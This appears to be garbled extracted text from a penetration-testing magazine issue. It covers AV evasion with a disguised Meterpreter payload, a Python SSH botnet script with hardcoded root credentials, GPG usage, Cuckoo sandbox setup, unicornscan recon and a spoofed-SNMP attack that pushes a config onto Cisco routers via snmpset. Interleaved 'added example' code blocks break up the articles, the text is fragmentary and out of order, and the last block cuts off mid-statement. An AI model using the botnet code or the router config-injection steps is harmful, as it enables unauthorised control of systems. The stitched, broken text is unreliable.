Privacy-preserving data publishing is an exciting research area. This article presents different technical proposals that answer the demand for simultaneous information sharing and privacy protection. However, the problems of data privacy cannot be fully solved by technology alone. We believe that there is an urgent need to bridge the gap between advanced privacy preservation technology and current policies. In the future, we expect that social and legal regulations will complement the best practices of privacy-preserving technology. To this end, it is also important to standardize some privacy models and algorithms for different applications, as it is unlikely that there exists a one-size-fits-all solution for every application scenario. Thus, the future research direction appears to lie in defining suitable privacy models, and in developing trustworthy algorithms and systems that provide performance guarantees ensuring the security and privacy of data for specific applications.
Noman Mohammed
Benjamin C. M. Fung
TECHNIQUES
AV Evasion: Bypassing AV Products and Protection Against It
AV evasion techniques are getting better and smarter by the day, and having just an anti-virus and anti-spyware application is insufficient to protect our machines from the other angles from which threats arrive.
Objective
Before We Begin
Figure 5. The more stealth you want, the bigger the size of the file
In this scenario, we are using the following specifications for the victim's machine:
Windows Server 2008 SP2 (64-bit) and Windows 7 Enterprise SP1 (64-bit),
Data Execution Prevention set to "Turn on DEP for essential Windows programs and services only",
Symantec Endpoint Protection v11.x, Antivirus and Anti-Spyware Protection only.
Execution of Employees Salaries-Confidential.pdf
On both machines, executing Employees Salaries-Confidential.pdf gave us a Meterpreter session (see Figure 12) despite Symantec Endpoint Protection having up-to-date definitions.
Prevention (I)
attack and classify the attack as a Meterpreter Reverse TCP attack (see Figure 14). In the Security Log (see Figure 15), it logs the event, the type of attack, where the attack originated from, and the full path of the executable.
References
Prevention (II)
What is DEP?
Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files. DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.
Figure 16. Data Execution Prevention Option
Conclusion
Fadli B. Sidek
TECHNIQUES
Phantoms Cerebrum
Using Python to Work a Botnet
Imagine a ghost robot in every computer, working in the shadows; let's call it the Phantom, performing tasks for its master. The master controls the ghosts through a master brain device; let's call it the cerebrum, much like the device Prof. Xavier had in the X-Men. That device could control the minds of mutants all over the world. In my case, the cerebrum controls the phantoms in each computer of my home and workplace.
Introduction
a programmer with the Python interpreter, the standard library, and several built-in modules. The Python standard library and built-in modules provide an extensive range of capabilities, including built-in data types, exception handling, numeric and math modules, file handling, cryptographic services, interoperability with the operating system, Internet data handling, and interaction with IP protocols, among many other useful modules. A programmer can also easily install third-party packages; a comprehensive list of third-party packages is available at http://pypi.python.org/pypi/.
If you are not comfortable with Python or haven't used it before, I highly recommend this: http://www.pythonforbeginners.com/systems-programming/how-to-use-fabric-in-python/.
Fabric Basics
Create a fabfile
Fabfiles
Installation
Advanced users wanting to install a development version may use pip to grab the latest master branch (as well as the dev version of the
Paramiko dependency):
Figure 1. Phantoms and their Cerebrum
Or, to install an editable version for debugging/hacking, execute pip install -e . (or python setup.py install) inside a downloaded or cloned copy of the source code.
It is important to note that Fabric tries to automatically detect the type of authentication needed (password or passphrase for private key). Therefore, if the passwords stored in the credentials file are for private keys, they should work seamlessly.
Now that we have our credentials, let's consider what functions we will create. For the sake of this post, let's implement the following:
Status check to see which hosts are running,
Run a supplied command on multiple selected hosts,
Create an interactive shell session with a host.
To start, we will import all members of the fabric.api namespace (import fabric.py):
from fabric.api import *
Next, we will use two of Fabric's environment variables, env.hosts and env.passwords, to manage our host connections. env.hosts is a list we can use to manage our master host list, and env.passwords is
        uptime, hosts=env.hosts).iteritems():
    running_hosts[host] = result if result.succeeded else "Host Down"
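The credentials file and the host bookkeeping described above, as an added example that is not part of the article's code: it builds the env.hosts list and the env.passwords map in the 'user@host:port' form that Fabric 1.x keys them by, and reduces per-host command results into the "Host Down" status table the menu prints. Fabric itself is not imported, so it runs offline; the CmdResult stand-in only mimics the .succeeded attribute of the result Fabric's run() returns, and the credentials text, addresses and passwords are constructed for the example.

```python
"""Added example (not the article's code): turn a credentials file into the
env.hosts list and env.passwords map that Fabric 1.x expects, and reduce
per-host results into the status table the article's menu prints.  Fabric
is not imported, so this runs offline; CmdResult is a stand-in exposing the
same .succeeded attribute as the result object Fabric's run() returns."""
from collections import namedtuple

# Constructed credentials file: one "user@host:port password" per line.
# Addresses and passwords are made up for this example.
CREDENTIALS_TEXT = """\
# lab hosts
root@192.168.56.110:22 toor
root@192.168.56.120:22 toor
admin@192.168.56.130:2222 s3cret
"""


def parse_credentials(text):
    """Return (hosts, passwords).

    hosts keeps file order and holds 'user@host:port' strings, the form
    Fabric uses for env.hosts; passwords maps each of those strings to its
    password, which is exactly how env.passwords is keyed.  Blank and '#'
    lines are skipped; a malformed or duplicate entry raises instead of
    silently leaving a host unreachable.
    """
    hosts, passwords = [], {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) != 2:
            raise ValueError("line %d: expected 'user@host:port password'" % lineno)
        spec, password = fields
        user, _, hostport = spec.partition("@")
        host, _, port = hostport.rpartition(":")
        if not (user and host and port.isdigit() and 0 < int(port) < 65536):
            raise ValueError("line %d: bad host spec %r" % (lineno, spec))
        if spec in passwords:
            raise ValueError("line %d: duplicate entry for %s" % (lineno, spec))
        hosts.append(spec)
        passwords[spec] = password
    return hosts, passwords


# Stand-in for Fabric's run() result: .succeeded plus the command output.
CmdResult = namedtuple("CmdResult", "succeeded output")


def status_table(hosts, results):
    """Map every host in env.hosts to its uptime line or 'Host Down'.

    results is {host: CmdResult}; hosts missing from it (no result came
    back at all) are reported down rather than silently dropped.
    """
    table = {}
    for host in hosts:
        result = results.get(host)
        if result is None or not result.succeeded:
            table[host] = "Host Down"
        else:
            table[host] = result.output.strip()
    return table


def render_table(table):
    """Render the ID | Host | Status layout as a list of text lines."""
    width = max(len(h) for h in table) if table else 4
    lines = ["ID | %-*s | Status" % (width, "Host"), "-" * (width + 14)]
    for idx, (host, status) in enumerate(table.items()):
        lines.append("%-2d | %-*s | %s" % (idx, width, host, status))
    return lines


if __name__ == "__main__":
    env_hosts, env_passwords = parse_credentials(CREDENTIALS_TEXT)
    # Constructed results, as if execute(run, 'uptime', hosts=env_hosts) had run.
    fake = {
        env_hosts[0]: CmdResult(True, "07:27:14 up 10:40, 2 users,\n"),
        env_hosts[1]: CmdResult(False, ""),
    }
    for line in render_table(status_table(env_hosts, fake)):
        print(line)
```

Keeping the password map keyed by the full 'user@host:port' string matters: Fabric looks passwords up by that exact key, so an entry written as 'root@host' without the port is simply never used and the run falls back to an interactive prompt.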
Listing 4. Menu function in action
C:\>python fabfile.py
[[email protected]:22] Executing task run_command
[[email protected]:22] Executing task run_command
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 1
ID | Host                    | Status
---------------------------------------
0  | [email protected]:22 | 07:27:14 up 10:40, 2 users,
1  | [email protected]:22 | 07:27:12 up 10:39, 3 users,
We call this a botnet because the compromised computers act like bots to carry out instructions. In order to construct our botnet, we will have to introduce a new concept: a class. The concept of a class serves as the basis for a programming model named object-oriented programming. In this system, we instantiate individual objects with associated methods. For our botnet, each individual bot or client will require the ability to connect and issue a command (Listing 5).
Examine the code to produce the class object Client(). Building the client requires a hostname, username, and a password or a key. Furthermore, the class contains the methods required to sustain a client: connect(), send_command(), alive(). Notice that when we reference a variable belonging to a class, we call it self followed by the variable name. To construct the botnet, we build a global array named botnet and this array contains individual client objects. Next, we build a function named addClient()
that takes a host, user, and password as input to instantiate a client object and add it to the botnet array. Next, the botnetCommand() function takes an argument of a command. This function iterates through the entire array and sends the command to each client in the botnet array (see Listing 6).
Host: 1
[[email protected]:22] Executing task open_shell
Last login: Wed Jul 24 07:27:44 2013 from 192.168.56.1
root@milindlab:~# whoami
root
root@milindlab:~# exit
logout
[0] List Hosts
[1] Run Command
[2] Open Shell
[3] Exit
fabric $ 3

import pxssh

class Client:
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()   # log in as soon as the object is built

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception, e:            # Python 2 syntax, as in the article
            print e
            print '[-] Error Connecting'
            # falls through and returns None; send_command() will fail on such a client

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()           # wait for the shell prompt to come back
        return self.session.before      # everything printed before that prompt
By wrapping everything up, we have our final SSH botnet script. This proves an excellent method for mass controlling targets. To test, we make three copies of our current BackTrack 5 virtual machine and assign. We see that the script can iterate through these three hosts and issue simultaneous commands to each of the victims. While the SSH botnet creation script attacked servers directly, the next section will focus on an indirect attack vector to target clients through vulnerable servers, and an alternate approach to building a mass infection.
Conclusion
same functionality could extend to any other IT automation solution such as Chef, Puppet, or Ansible.
Milind Bhargava
botNet = []
addClient('192.168.56.110', 'root', 'toor')
addClient('192.168.56.120', 'root', 'toor')
addClient('192.168.56.130', 'root', 'toor')
botnetCommand('uname -v')
botnetCommand('cat /etc/issue')
Cryptography
with GPG
We are familiar with cryptography and know something about it, but let's review its history. Cryptography is a technique for secure communication. In a community, it may mean relationships between individuals in a society or relationships on the Internet. The cryptography of the present world has been pulled into the world of the Internet. Present, or modern, cryptography engages topics like mathematics, computer science, and electrical engineering.
Plain:  A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Cipher: D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Modern Cryptography
Asymmetric key algorithms refer to a cryptographic system with two separate keys, one of which is secret and one of which is public. Although the two keys are different, both parts of the key pair are mathematically linked. One key locks (encrypts) the plaintext, and the other unlocks (decrypts) the ciphertext. The keys are complementary and neither key can perform both functions by itself. The public key can be published without worries, but the private key must not be shown to anyone not authorized to read the messages. Unlike symmetric key algorithms, a public key algorithm does not require a secure channel to exchange secret keys between the sender and the receiver. It is the infrastructure of several Internet standards like Transport Layer Security (TLS), PGP, and GPG. Each user has two keys (a public encryption key and a private decryption key). The public key is available to the public, but the private key is known only to the recipient. Messages are encrypted with the recipient's public key, and can be decrypted only with the corresponding private key.
We want to describe GnuPG, which is used widely on the Internet.
PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and partitions. Each public key is bound to a username and/or an email address. For privacy, PGP combines symmetric-key encryption and public-key encryption.
GnuPG, or GPG, is a suite of cryptographic software; it is an OpenPGP standard compliant system. GPG is by default a command-line program, but some graphical user interfaces are provided for it. For example, GnuPG encryption support has been integrated into KMail, Evolution and Thunderbird. There are other GUI tools for GPG: Seahorse for GNOME, KGPG for KDE. GPG is used in some messengers too, for example Psi and Fire. These messengers can automatically secure messages when GnuPG is installed and configured. GPG is also embedded in web applications; web-based software such as Horde also makes use of it. FireGPG is a good example for Mozilla Firefox. GnuPG also supports symmetric encryption algorithms, but by default GnuPG uses the CAST5 symmetric algorithm.
You can install GPG very easily. It is installed by default on many Linux distros. For more information about it visit http://www.gnupg.org/.
Enter y to finish the process. Next, you must enter your name and email address (see Listing 3), but remember that this information is for authenticating you as a real individual. You can use the comment field to include aliases or other information. Then the message below appears:
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit?
You can edit your previous information; for example, enter N to change your name. If the data is correct, enter O for confirmation.
Make a Backup
To list the keys on your public keyring use the following command:
mohsen@crunchbang-jokar:~$ gpg --list-keys
/home/mohsen/.gnupg/pubring.gpg
-------------------------------
pub   2048R/08E3A968 2013-01-08 [expires: 2014-01-08]
uid                  mohsen <XXXXXXXXX>
sub   2048R/12D6F55B 2013-01-08 [expires: 2014-01-08]
Exported keys are in binary format by default, but gpg has an option, --armor, that will export your key in ASCII format:
mohsen@crunchbang-jokar:~$ gpg --output <a name>.gpg --armor --export <your email>
he encrypts it using your public key, and you decrypt it with your private key.
To encrypt a document we use the --encrypt option. You must have the public key of the recipient so this message can be encrypted and sent. GPG uses the --output option to name the result. For example:
mohsen@crunchbang-jokar:~$ gpg --output <output file> --encrypt --recipient <recipient's email> <input file>
quently modified in any way, verification of the signature will fail. It is like a handwritten signature with the additional benefit that the user can be sure a file has not been modified since it was created. Creating and verifying signatures uses the public/private key pair, but it is a different operation from encryption and decryption. For example, you want to use your own private key to digitally sign a letter and send it to PenTest Magazine. The editor uses your public key to check the signature and verify that the submission indeed came from you and that it has not been modified since you sent it. The command-line option --sign is used to make a digital signature:
You can check the signature, or check the signature and recover the original document. For this purpose the --verify option is used.
mohsen@crunchbang-jokar:~$ gpg --verify <input file>
gpg: Signature made Wed 09 Jan 2013 03:31:42 AM EST using RSA key ID 08E3A968
gpg: Good signature from mohsen <XXXXXXXXXX>
Conclusion
TOOLS
Automating Malware Analysis with Cuckoo
Malicious software has always been a problem in the computer industry. Understanding the way this type of software is written, the impact it presents to the infected, and removal methodologies is a time consuming process, especially in corporate environments where you have thousands of connected devices. A recent study published by Panda Labs in 2012 indicated that over 27 million new strains of malware were discovered in the wild [1]. The need for quick, accurate, and highly automated analysis of malware is warranted.
This article will outline implementing an automated virtual environment to aid in the identification and analysis of potentially malicious software, which can then be extended to proactively detect and ultimately protect corporate environments from being infected.
Introduction
Malware, short for malicious (or malevolent) software, is software used or created by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems. It can appear in the form of code, scripts, active content, and other software. Malware is a general term used to refer to a variety of forms of hostile or intrusive software. Malware includes computer viruses, ransomware, worms, trojan horses, rootkits, keyloggers, dialers, spyware, adware, malicious browser helper objects (BHOs) and other malicious programs; the majority of active malware threats are usually worms or trojans rather than viruses [2].
Computers and servers are no longer the only things at risk of being infected: with the popularity of mobile computing, enterprises are quickly adopting BYOD strategies to support personal devices within the corporate environment. The conveniences of portable browsers will likely lead to
Behavioral Analysis
Code Analysis
Code analysis involves disassembling and reverse engineering the code of the malware. This
being used. Isolating your malware lab from other computers in the network is often not enough. Typically, you should isolate them from the Internet as well.
Once your lab is set up with at least one guest operating system, you will need to download Cuckoo [11], the malware sandbox that allows for automating behavior analysis of malicious samples. Cuckoo Sandbox is an application that provides a virtual sandbox for the automatic analysis of malware specimens. Originally developed by Claudio Guarnieri for the Google Summer of Code, the project became so popular it is now a mainstay of the Honeynet Project, a leading international research institution with a special focus on malware. The platform allows for the automatic capture and advanced analysis of dangerous strains of malware in a contained environment [17].
Since Cuckoo is based on Python you will need to ensure it is installed on your system, along with any additional dependencies needed.
At a high level there are other optional dependencies that are mostly used by modules and utilities. The following libraries are not strictly required, but their installation is recommended [18]:
Dpkt (Highly Recommended): for extracting relevant information from PCAP files.
Jinja2 (Highly Recommended): for rendering the HTML reports and the web interface.
Magic (Optional): for identifying file formats (otherwise use the file command line utility).
Pydeep (Optional): for calculating the ssd deep fuzzy hash of files.
Pymongo (Optional): for storing the results in a MongoDB database.
Yara and Yara Python (Optional): for matching Yara signatures (use the svn version).
Libvirt (Optional): for using the KVM machine manager.
Bottlepy (Optional): for using the web.py and api.py utilities.
Pefile (Optional): used for static analysis of PE32 binaries.
Before downloading Cuckoo let's make sure we have all the necessary dependencies and modules installed; begin by installing Python (see Listing 1).
ssdeep is a program for computing context triggered piecewise hashes (CTPH), also called fuzzy hashes. You will need to install ssdeep and the related Python modules to support this function (see Listing 2).
TcpDump is necessary for creating packet captures of network activity for analysis on the guest operating system when malware is submitted; this is an important step to ensure your sniffer is properly configured (see Listing 3).
A virtualization platform is required; this is where you will be submitting your malware samples. The command below will install VirtualBox from the repository; alternatively you can navigate to the website https://www.virtualbox.org/wiki/downloads and manually download and install your platform package (see Listing 4).
Cuckoo Sandbox is hosted on GitHub; if you don't have git installed, below are the commands to achieve this and clone Cuckoo (see Listing 5, Figure 1).
At this point you should have all the necessary software and recommended dependencies installed, and you can begin creating your guest virtual image using Windows 7 or Windows XP.
Figure 2. agent.py
Figure 3. Virtualbox.conf
Figure 4. Cuckoo.conf
The virtualbox.conf file contains all the configurations for your virtual environment. You will need to change the machine name, IP address, and label to match what you have in your environment (see Figure 3).
Contained within the cuckoo.conf file is a reporting server value; make sure this matches the IP address of your host machine. If you're unsure of this value you can set it to 127.0.0.1 as pictured in Figure 4.
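A pre-flight check over the two files just described, as an added example (my code, not the article's and not part of Cuckoo). It assumes the INI layout of the Cuckoo releases of that period as I remember it: a [virtualbox] section whose machines key lists one section per guest holding label, platform and ip, and a [resultserver] section in cuckoo.conf holding ip and port. Treat those names as assumptions and compare them with the files in your own conf/ directory. The check also warns when the reporting address is loopback, because the guest analyzer has to reach that address over the host-only network, and from inside a VM 127.0.0.1 is the guest itself. Both sample files are constructed.

```python
"""Added example, not part of the article or of Cuckoo: a pre-flight check
of virtualbox.conf and cuckoo.conf before running ./cuckoo.py.  Section and
key names follow the Cuckoo INI layout of that era as I remember it (an
assumption to verify against your own conf/ directory)."""
import configparser
import ipaddress

# Constructed sample virtualbox.conf with the three values the article says to change.
VIRTUALBOX_CONF = """\
[virtualbox]
mode = gui
path = /usr/bin/VBoxManage
machines = cuckoo1

[cuckoo1]
label = cuckoo1
platform = windows
ip = 192.168.56.101
"""

# Constructed sample cuckoo.conf; the guest analyzer reports back to resultserver.
CUCKOO_CONF = """\
[cuckoo]
version_check = on

[resultserver]
ip = 192.168.56.1
port = 2042
"""


def _load(text):
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    return cfg


def _parse_ip(value):
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def check_lab_config(virtualbox_text, cuckoo_text):
    """Return a list of problem strings; an empty list means the config looks usable."""
    problems = []
    vbox, cuckoo = _load(virtualbox_text), _load(cuckoo_text)

    # The guest connects *out* to the resultserver, so it must be an address
    # the guest can route to, normally the host's host-only adapter.
    rs_ip = _parse_ip(cuckoo.get("resultserver", "ip", fallback=""))
    if rs_ip is None:
        problems.append("cuckoo.conf: [resultserver] ip is missing or not an IP address")
    elif rs_ip.is_loopback:
        problems.append("cuckoo.conf: [resultserver] ip is loopback; from inside the guest "
                        "127.0.0.1 is the guest itself, so results can never arrive")

    names = [m.strip() for m in vbox.get("virtualbox", "machines", fallback="").split(",") if m.strip()]
    if not names:
        problems.append("virtualbox.conf: [virtualbox] machines is empty")

    for name in names:
        if not vbox.has_section(name):
            problems.append("virtualbox.conf: machine %r is listed but has no [%s] section" % (name, name))
            continue
        for key in ("label", "platform", "ip"):
            if not vbox.get(name, key, fallback="").strip():
                problems.append("virtualbox.conf: [%s] is missing %s" % (name, key))
        ip_text = vbox.get(name, "ip", fallback="").strip()
        if not ip_text:
            continue  # already reported as missing
        guest_ip = _parse_ip(ip_text)
        if guest_ip is None:
            problems.append("virtualbox.conf: [%s] ip %r is not an IP address" % (name, ip_text))
        elif rs_ip is not None and guest_ip == rs_ip:
            problems.append("virtualbox.conf: [%s] ip is the same as the resultserver ip" % name)
    return problems


if __name__ == "__main__":
    for problem in check_lab_config(VIRTUALBOX_CONF, CUCKOO_CONF) or ["config looks usable"]:
        print(problem)
```

Run it against the real files by reading them into the two text arguments; a non-empty list is worth fixing before the first sample is submitted, since a wrong resultserver address shows up only as an analysis that never completes.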
At this point we are ready to launch Cuckoo and submit malware samples. To launch the application type ./cuckoo.py.
This will start the application and indicate if it's ready for malware specimens. If you receive any errors on the screen you will need to have these corrected (see Figure 5).
References
/opt/cuckoo/utils/submit.py /path-to-malware/malware_sample
Conclusion
Christopher Ashby
Christopher Ashby, Principle IT Security Analyst at GLOBALFOUNDRIES, has more than 15 years of proven experience participating in a broad range of corporate initiatives including architecting, engineering, and operating
information-security solutions in direct support of business objectives. In his most current role he serves alongside a team of engineers responsible for the security of
a large global organization. For specific information on
the author or to contact him please visit his LinkedIn
profile (http://www.linkedin.com/in/ashbyca).
The first and critical phase of testing is reconnaissance, where we usually rely on nmap, which is the most famous and the best tool (or one of the best ones). Recently, I have started to use unicornscan to complete my reconnaissance phase and I have found several very useful options of this tool, and these options will be explained in this article.
-R: repeating packets, which is a very useful option to get more reliable results and in situations where you test unreliable networks;
192.168.1.110:53 meaning scan port 53; the syntax could be 192.168.1.110:21,22,53, which means that ports 21,22,53 will be scanned; 192.168.1.110:a means scanning all ports 1-65535;
-P 'port 80': activating pcap filters;
-w: writing responses in a .pcap format file; very useful for writing reports.
TCP open 192.168.1.128:22 ttl 64
TCP open 192.168.1.110:80 ttl 64
TCP open 192.168.1.128:80 ttl 64
TCP open 192.168.1.128:3306 ttl 64
TCP open 192.168.1.128:443 ttl 64
TCP open 192.168.1.110:631 ttl 64
sender statistics 127.4 pps with 86528 packets sent total
listener statistics 671 packets recieved 0 packets droped and 0 interface drops
TCP open                     ftp[   21]         from 192.168.1.110  ttl 64
TCP open                    http[   80]         from 192.168.1.110  ttl 64
TCP open                     ipp[  631]         from 192.168.1.110  ttl 64
TCP open                     ftp[   21]         from 192.168.1.128  ttl 64
TCP open                     ssh[   22]         from 192.168.1.128  ttl 64
TCP open                    http[   80]         from 192.168.1.128  ttl 64
TCP open                   https[  443]         from 192.168.1.128  ttl 64
TCP open                   mysql[ 3306]         from 192.168.1.128  ttl 64
root@bt:~ #
unicornscan -H -msf -Iv -P port 80 -w http.pcap 192.168.1.110
using interface(s) vmnet0
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
opening `http.pcap for pcap log
connected 192.168.1.1:14145 -> 192.168.1.110:80
TCP open 192.168.1.110:80 ttl 64
sender statistics 272.2 pps with 338 packets sent total
listener statistics 5 packets recieved 0 packets droped and 0 interface drops
TCP open
http[
80]
from 192.168.1.110 ttl 64
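The output format shown above, turned into something a report can be built from, as an added example that is not part of the article: a parser for both line shapes unicornscan prints (the live "TCP open <ip>:<port> ttl <n>" lines and the closing "TCP open <service>[ <port>] from <ip> ttl <n>" summary), a sorted per-host table, and a diff of two scans so new ports stand out between assessments. The sample text is constructed from the addresses and ports printed above; the regular expressions are mine and match that output, not every possible unicornscan mode.

```python
"""Added example, not from the article: parse unicornscan's text output into
a per-host port table and diff two scans.  Handles the live lines and the
summary lines seen in the article's output; the sample is constructed."""
import re
from collections import defaultdict

SAMPLE_OUTPUT = """\
TCP open 192.168.1.128:22 ttl 64
TCP open 192.168.1.110:80 ttl 64
TCP open 192.168.1.128:3306 ttl 64
sender statistics 127.4 pps with 86528 packets sent total
listener statistics 671 packets recieved 0 packets droped and 0 interface drops
TCP open                     ssh[   22]         from 192.168.1.128  ttl 64
TCP open                    http[   80]         from 192.168.1.110  ttl 64
TCP open                   mysql[ 3306]         from 192.168.1.128  ttl 64
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
LIVE_RE = re.compile(r"^(?P<proto>TCP|UDP) open (?P<ip>%s):(?P<port>\d+) ttl (?P<ttl>\d+)" % IPV4)
SUMMARY_RE = re.compile(
    r"^(?P<proto>TCP|UDP) open\s+(?P<svc>\S+)\[\s*(?P<port>\d+)\]\s+from (?P<ip>%s)\s+ttl (?P<ttl>\d+)" % IPV4
)


def parse_unicornscan(text):
    """Return {ip: {port: {'proto', 'service', 'ttl'}}}.

    The same port appears once in the live output and once in the summary;
    the two are merged so the service name from the summary is attached to
    the port seen earlier and nothing is counted twice.
    """
    hosts = defaultdict(dict)
    for raw in text.splitlines():
        m = LIVE_RE.match(raw) or SUMMARY_RE.match(raw)
        if not m:
            continue  # statistics lines, banners, blank lines
        f = m.groupdict()
        entry = hosts[f["ip"]].setdefault(
            int(f["port"]), {"proto": f["proto"], "service": None, "ttl": int(f["ttl"])}
        )
        if f.get("svc"):
            entry["service"] = f["svc"]
    return dict(hosts)


def report_lines(hosts):
    """One line per open port, sorted by address then port, for a findings table."""
    out = []
    for ip in sorted(hosts, key=lambda a: tuple(int(o) for o in a.split("."))):
        for port in sorted(hosts[ip]):
            e = hosts[ip][port]
            out.append("%-15s %-4s %5d %-8s ttl %d" % (ip, e["proto"], port, e["service"] or "?", e["ttl"]))
    return out


def new_ports(baseline, current):
    """Ports open now that were not open in the baseline scan, per host."""
    diff = {}
    for ip, ports in current.items():
        added = sorted(set(ports) - set(baseline.get(ip, {})))
        if added:
            diff[ip] = added
    return diff


if __name__ == "__main__":
    table = parse_unicornscan(SAMPLE_OUTPUT)
    for line in report_lines(table):
        print(line)
    # Constructed earlier scan: only ssh was open on .128 back then.
    print(new_ports({"192.168.1.128": {22: {}}}, table))
```

Feeding it the saved stdout of a scan is enough; the pcap written with -w remains the evidence for the report, while this table is what goes into it.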
-s 10.23.23.23 192.168.1.110
Aleksandar Bratic
Aleksandar Bratic (CISSP) works as CISO at a financial institution in Serbia, and has interests in penetration testing, methodologies, techniques, risk mitigation methods and countermeasures.
Setup
able to create files on the fly as configs are collected. Edit /etc/default/tftpd-hpa and make sure TFTP_OPTIONS has the -c:
TFTP_OPTIONS="-c --secure"
The router will use its routing table to make the tftp request and that outgoing interface can be different than what you have targeted.
The OID we want is 1.3.6.1.4.1.9.2.1.53.<tftpserver_ip> and you will need to set a variable to be the filename of the config. With the write variable in hand, we can use snmpset and hopefully upload the new.cfg file easily.
root@bt:/# snmpset -v 1 -c abc123 192.168.100.254 1.3.6.1.4.1.9.2.1.53.192.168.101.108 s new.cfg
-c abc123 is the write community.
192.168.101.108 is the tftp server hosting the config.
Putting a Config
If all is well you should see a config being uploaded. The Cisco IOS commands contained in the file new.cfg will have been uploaded and merged right into the running config. The IOS commands could have been any valid IOS command available, from resetting the enable password to modifying an ACL.
ing the source address nearly impossible given we cannot control the routing back to the spoofed address. In spoofing traffic, everything must be contained in one single packet. Of the UDP protocols, SNMP has the most potential: it has command and control uses, in v1 it uses unencrypted passwords, and it is still widely deployed.
From the diagram of the packet and the hosts (Figure 1), you can see that a forged SNMP packet is sent to the victim router, which will respond to the forged packet by sending a response to the spoofed host. Here the spoofed host is quite surprised to get a response to a packet that it never sent. This unexpected response is sometimes logged, but other times may get discarded depending on the setup.
Can I spoof traffic from my Internet connection?
The answer is maybe. About 30% of Internet connections have ISPs that do not properly filter source addresses. There are a number of tools and tricks to check if you can spoof an address. However, before you try to experiment, you almost certainly need to directly connect to the Internet without a firewall/NAT router. Any kind of NAT will rewrite your source addresses by definition and any modern firewall will check the reverse path and drop your packets. If your ISP correctly filters spoofed addresses, you are out of luck and will need to try another connection.
You need to construct a file that contains a list of hosts to spoof. When spoofing large netblocks, use host IP addresses at the beginning and end of the netblocks. Also try and randomize some of the addresses; you never know, we all get lucky sometimes when guessing. You will also need a large dictionary to test against. Be aware here that your search space will be (number of hosts * dictionary size), so 100 hosts with a dictionary of 100 words becomes a search space of 10,000 combinations. The current tool can brute force 280 packets a second, so plan ahead before you attempt extremely large dictionaries and enumerated netblocks. Next, you need to make sure hping2 is installed on your machine. This is the tool we are going to use to stuff raw spoofed packets onto the network. You will also need od, sed, xxd and bash; these are almost always installed somewhere on any modern Unix system.
differences in password length. Since an attacker needs to modify the tftp server IP address, this needs to change as well. All the variables in the packet are wrapped by header and length values. This means that to construct an SNMP set packet I had to write and recalculate all parts of the packet in the script. Listing 3 shows the script written in bash.
In the script, we are at the main loop of the program. From here the operations are trivial. We first
router#
router# copy startup running
router#clear log
router#y
Download links
http://www.surf.vi/down/example.cfg
http://www.surf.vi/down/ciscospoofer.sh
Detection
This isn't a perfect story though; syslog/tacacs/rancid are all going to leave traces here of what you did. When the router receives an snmpset config upload, it sends a message to syslog about the config upload. This is really a bad thing to see in your syslogs; you should expect most admins to take action upon seeing an upload from a foreign address.
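The detection side of the paragraph above, as an added example that is not part of the article: a small check that pulls the configuration-change events the router logs out of a syslog feed and raises an alert when the change arrived through an SNMP set or from an address outside the trusted management networks. The message text follows the shape of Cisco IOS's %SYS-5-CONFIG_I line as I know it ("Configured from <source> by <user or snmp> ..."); that pattern and the sample lines, hosts and times are constructed for this example, so compare the regular expression with what your own routers actually emit before relying on it.

```python
"""Added example, not from the article: flag SNMP-driven configuration
changes in a router syslog feed.  The CONFIG_I format is modelled on Cisco
IOS's %SYS-5-CONFIG_I message as I remember it (an assumption); the sample
lines are constructed."""
import re
from ipaddress import ip_address, ip_network

# Constructed feed: an admin change over vty from the management network, two
# SNMP-set uploads (one from the tftp host in the article, one from a spoofed
# address), and an unrelated link message.
SAMPLE_SYSLOG = """\
Jul 24 07:31:02 router1 123: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.168.100.10)
Jul 24 07:33:15 router1 124: %SYS-5-CONFIG_I: Configured from 192.168.101.108 by snmp
Jul 24 07:33:16 router1 125: %SYS-5-CONFIG_I: Configured from 10.23.23.23 by snmp
Jul 24 07:40:00 router1 126: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to up
"""

CONFIG_RE = re.compile(
    r"%SYS-5-CONFIG_I: Configured from (?P<src>\S+) by (?P<by>\S+)"
    r"(?: on (?P<line>\S+) \((?P<peer>[0-9.]+)\))?"
)


def parse_config_event(line):
    """Return {'method', 'origin', 'line'} for a CONFIG_I line, else None.

    origin is the IP the change came from: the 'from' field when it is an
    address (the SNMP case), otherwise the peer address in parentheses
    (the vty case).  None when neither is an address.
    """
    m = CONFIG_RE.search(line)
    if not m:
        return None
    origin = None
    for candidate in (m.group("src"), m.group("peer")):
        if candidate is None:
            continue
        try:
            origin = ip_address(candidate)
            break
        except ValueError:
            continue
    return {"method": m.group("by"), "origin": origin, "line": line}


def detect_config_changes(lines, trusted_nets):
    """Alert on config events written via SNMP or coming from outside the
    trusted management networks; each alert carries every reason it fired."""
    nets = [ip_network(n) for n in trusted_nets]
    alerts = []
    for line in lines:
        event = parse_config_event(line)
        if event is None:
            continue
        reasons = []
        if event["method"] == "snmp":
            reasons.append("configuration written through an SNMP set")
        origin = event["origin"]
        if origin is None:
            reasons.append("source address could not be determined")
        elif not any(origin in net for net in nets):
            reasons.append("source %s is outside the trusted management networks" % origin)
        if reasons:
            alerts.append({"source": None if origin is None else str(origin),
                           "method": event["method"], "reasons": reasons, "line": line})
    return alerts


if __name__ == "__main__":
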